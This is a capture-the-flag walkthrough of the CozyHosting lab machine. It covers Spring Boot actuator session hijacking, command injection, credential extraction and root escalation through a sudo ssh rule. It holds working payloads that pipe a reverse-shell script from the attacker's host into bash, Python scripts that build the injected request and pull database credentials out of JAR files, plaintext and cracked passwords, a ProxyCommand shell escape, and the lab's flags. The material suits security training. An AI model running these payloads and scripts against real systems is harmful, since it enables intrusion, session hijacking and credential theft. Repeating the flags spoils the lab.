Cozy Hosting - Walkthrough

CozyHosting is an easy-difficulty Linux machine that features a Spring Boot application. The application has the Actuator endpoint enabled. Enumerating the endpoint leads to the discovery of a user's session cookie, leading to authenticated access to the main dashboard. The application is vulnerable to command injection, which is leveraged to gain a reverse shell on the remote machine. Enumerating the application's JAR file, hardcoded credentials are discovered and used to log into the local database. The database contains a hashed password, which once cracked is used to log into the machine as the user josh. The user is allowed to run ssh as root, which is leveraged to fully escalate privileges.

Enumeration

We begin with an Nmap scan to identify open services:

sudo nmap -p- -n -Pn --disable-arp-ping -sS -sV -sC -vvv -T5 10.10.11.230 -oN cozyHosting

The scan reveals:

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1
80/tcp open  http    nginx 1.18.0

The web server redirects to cozyhosting.htb. We add it to /etc/hosts:

echo "10.10.11.230 cozyhosting.htb" | sudo tee -a /etc/hosts

[Screenshot: cozyhosting.htb]

We perform content discovery:

ffuf -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt:FFUZ -u http://cozyhosting.htb/FFUZ -ic -c -t 100 --mc all -fc 404

Requesting a non-existent path returns Spring Boot's default error response, which identifies the framework:

Whitelabel Error Page

We scan for Spring Boot Actuator endpoints:

ffuf -w /usr/share/seclists/Discovery/Web-Content/spring-boot.txt:FFUZ -u http://cozyhosting.htb/FFUZ -ic -c -t 100 --mc all -fc 404

Discovered endpoints include /actuator/sessions.

Foothold

The /actuator/sessions endpoint lists the IDs of the active sessions together with the principal each one belongs to. Since the session cookie is nothing more than that ID, any listed session can be replayed:

[Screenshot: /actuator/sessions output]

We copy kanderson's session ID into our own session cookie in the browser's developer tools and reload the page:

[Screenshot: session hijacking]

We access the admin panel at /admin:

[Screenshot: admin panel]

The "Automatic Patching" form takes a hostname and a username and uses them to run a command on the server; the username is passed through unsanitised, so it is vulnerable to command injection. We first confirm blind execution with a callback to an HTTP listener waiting on port 7000 of our machine (${IFS} stands in for a space in the payload):

hostname: 127.0.0.1
username: test;curl${IFS}http://10.10.14.63:7000;

Once the listener records the hit, we serve a reverse shell script (rev.sh) from the same listener, start a handler for the callback, and inject a one-liner that fetches the script and pipes it to bash:

test;curl${IFS}http://10.10.14.63:7000/rev.sh|bash;

Shell obtained as app.
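The two foothold steps above (read a session ID out of the actuator, then inject into the patching form) are easy to script. The following is an added example written for this walkthrough, not code from the original post or from the target application. It parses a constructed /actuator/sessions response (both Spring Boot's standard `{"sessions": [...]}` shape and a flat `{"<id>": "<principal>"}` map), picks a logged-in user's session, and builds the injected POST. The request path `/executessh`, the form field names `host` and `username`, and the cookie name `JSESSIONID` (Spring's default) are assumptions and should be confirmed against the admin page's HTML before use.

```python
import json
from urllib.parse import urlencode

# Constructed sample responses (not captured from the box). Spring Boot's own
# SessionsEndpoint answers with {"sessions": [{"id": ..., "principalName": ...}]};
# a custom or older endpoint may answer with a flat {"<session id>": "<principal>"} map.
SAMPLE_SESSIONS_STANDARD = json.dumps({
    "sessions": [
        {"id": "E0A1B2C3D4E5F60718293A4B5C6D7E8F", "principalName": "kanderson",
         "maxInactiveInterval": 1800, "expired": False},
        {"id": "00112233445566778899AABBCCDDEEFF", "principalName": "kanderson",
         "maxInactiveInterval": 1800, "expired": True},
    ]
})
SAMPLE_SESSIONS_FLAT = json.dumps({
    "1F2E3D4C5B6A79880796A5B4C3D2E1F0": "kanderson",
    "FFEEDDCCBBAA99887766554433221100": "UNAUTHORIZED",
})


def extract_sessions(body):
    """Return {session_id: principal} for every live session in the response,
    accepting either of the two shapes above."""
    data = json.loads(body)
    if not isinstance(data, dict):
        raise ValueError("unexpected /actuator/sessions body")
    if isinstance(data.get("sessions"), list):
        return {s["id"]: (s.get("principalName") or "UNAUTHORIZED")
                for s in data["sessions"] if not s.get("expired")}
    return {sid: str(principal) for sid, principal in data.items()}


def pick_victim(sessions, skip=("UNAUTHORIZED", "anonymousUser")):
    """First (session_id, principal) that belongs to a logged-in user, else None."""
    for sid, who in sessions.items():
        if who not in skip:
            return sid, who
    return None


def inject_username(cmd, prefix="test"):
    """Build the injected 'username' value. Spaces become ${IFS}, as in the
    walkthrough's payload; the leading 'test;' ends the ssh user token and
    the trailing ';' discards whatever the server appends after it."""
    if "\n" in cmd or "\r" in cmd:
        raise ValueError("newlines are not safe in a form field value")
    return prefix + ";" + cmd.replace(" ", "${IFS}") + ";"


def build_request(base_url, session_id, cmd, host="127.0.0.1",
                  path="/executessh", host_field="host", user_field="username"):
    """(url, headers, body) for the injected POST. The path and the form field
    names are assumptions; read them from the admin page's HTML before use."""
    body = urlencode({host_field: host, user_field: inject_username(cmd)})
    headers = {"Cookie": "JSESSIONID=" + session_id,  # Spring's default cookie name
               "Content-Type": "application/x-www-form-urlencoded"}
    return base_url.rstrip("/") + path, headers, body


if __name__ == "__main__":
    sid, who = pick_victim(extract_sessions(SAMPLE_SESSIONS_FLAT))
    url, headers, body = build_request(
        "http://cozyhosting.htb", sid, "curl http://10.10.14.63:7000/rev.sh|bash")
    print("replaying session of", who)
    print("curl -s -X POST '%s' -H 'Cookie: %s' --data '%s'"
          % (url, headers["Cookie"], body))
```

Running the script prints a ready-made curl command; swap the sample body for the real endpoint's response and the command becomes the one you actually fire. Note that the form encoding turns `${IFS}` and `;` into percent-escapes, which the server decodes before the shell sees them, so the whitespace restriction is only a problem on the shell side, which `${IFS}` solves.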

Post-Exploitation

The application's JAR (cloudhosting-0.0.1.jar) is readable by the app user. A Spring Boot fat JAR is just a ZIP, so we unpack it and read the bundled configuration:

unzip -d /tmp/app cloudhosting-0.0.1.jar
cat /tmp/app/BOOT-INF/classes/application.properties

application.properties contains the hardcoded PostgreSQL datasource credentials:

Username: postgres
Password: Vg&nvzAQ7XxR
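The unzip-and-cat step generalises to any Spring Boot fat JAR found on a host. The following added example (not from the original walkthrough) reads every `BOOT-INF/classes/*.properties` entry straight out of the archive with Python's zipfile module and returns the `spring.datasource.*` keys plus anything else whose name suggests a secret. The JAR it builds for demonstration is constructed in a temp file; its property values are placeholders, not the real application's.

```python
import os
import re
import tempfile
import zipfile

# Keys Spring Boot reads for the primary DataSource.
DATASOURCE_KEYS = ("spring.datasource.url",
                   "spring.datasource.username",
                   "spring.datasource.password")


def parse_properties(text):
    """Minimal java.util.Properties parser: '#'/'!' comments, 'key=value',
    'key: value' or 'key value', and backslash line continuation."""
    props, logical = {}, []
    for raw in text.splitlines():
        line = raw.lstrip()
        if not logical and (not line or line[0] in "#!"):
            continue
        logical.append(line)
        if line.endswith("\\") and not line.endswith("\\\\"):
            logical[-1] = logical[-1][:-1]   # continuation: keep collecting
            continue
        joined, logical = "".join(logical), []
        m = re.match(r"([^=:\s]+)\s*[=:\s]\s*(.*)", joined)
        if m:
            props[m.group(1)] = m.group(2).strip()
    return props


def datasource_creds(jar_path):
    """Scan BOOT-INF/classes/*.properties inside a fat JAR and return the
    datasource settings plus any key that looks like a credential."""
    found = {}
    with zipfile.ZipFile(jar_path) as jar:
        for name in jar.namelist():
            if name.startswith("BOOT-INF/classes/") and name.endswith(".properties"):
                props = parse_properties(jar.read(name).decode("utf-8", "replace"))
                for key, value in props.items():
                    if key in DATASOURCE_KEYS or re.search(r"password|secret|token", key, re.I):
                        found[key] = value
    return found


def build_sample_jar():
    """Write a constructed fat-JAR layout to a temp file and return its path.
    Values are placeholders, not the real application's configuration."""
    props = (
        "# constructed sample application.properties\n"
        "server.port=8080\n"
        "management.endpoints.web.exposure.include=health,beans,env,sessions,mappings\n"
        "spring.datasource.url=jdbc:postgresql://localhost:5432/cozyhosting\n"
        "spring.datasource.username=postgres\n"
        "spring.datasource.password=ExamplePassw0rd!\n"
        "spring.jpa.hibernate.ddl-auto=none\n"
    )
    fd, path = tempfile.mkstemp(suffix=".jar")
    os.close(fd)
    with zipfile.ZipFile(path, "w") as jar:
        jar.writestr("META-INF/MANIFEST.MF", "Manifest-Version: 1.0\n")
        jar.writestr("BOOT-INF/classes/application.properties", props)
    return path


if __name__ == "__main__":
    import sys
    target = sys.argv[1] if len(sys.argv) > 1 else build_sample_jar()
    for key, value in datasource_creds(target).items():
        print("%s = %s" % (key, value))
```

Point it at a real JAR (`python3 jarcreds.py /app/cloudhosting-0.0.1.jar`) and it prints the same lines you would otherwise grep out of the unpacked tree, without writing anything to disk on the target. The properties parser deliberately handles the `key: value` and continuation-line forms, since hand-written Spring configs use them more often than one expects.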

We connect to the database:

psql -h 127.0.0.1 -U postgres
\connect cozyhosting
SELECT * FROM users;
kanderson: $2a$10$E/Vcd9ecflmPudWeLSEIv.cvK6QjxjWlWXpij1NVNV3Mm6eH58zim
admin: $2a$10$SpKYdHLB0FOaT7n3x72wtuS0yR8uqqbNNpIPjUb2MZib3H9kVO8dm

Both hashes are bcrypt (the $2a$10$ prefix, hashcat mode 3200). The admin hash cracks against rockyou:

hashcat -m 3200 hash /usr/share/wordlists/rockyou.txt

Password: manchesterunited

The same password is reused by the local account josh, so we SSH in with it:

ssh [email protected]
cat user.txt

User flag: fd79dfb77157895eb84280b58a42af44

Privilege Escalation

We check sudo privileges:

sudo -l
User josh may run the following commands on localhost:
    (root) /usr/bin/ssh *

The rule lets josh run ssh as root with any arguments. ssh's PermitLocalCommand/LocalCommand options execute a local command as the invoking user, here root, once a connection has been established, so we point it at /bin/bash:

sudo /usr/bin/ssh -o PermitLocalCommand=yes -o 'LocalCommand=/bin/bash' [email protected]

LocalCommand only fires after the SSH session is up, so the target must actually accept the login. If it does not, the GTFOBins variant that passes -o ProxyCommand=';sh 0<&2 1>&2' spawns the shell from the proxy command before any connection is attempted and does not depend on authentication succeeding.

Root shell obtained:

cat /root/root.txt

Root flag: 6b665d141bccb338bc9c15bc65a2b300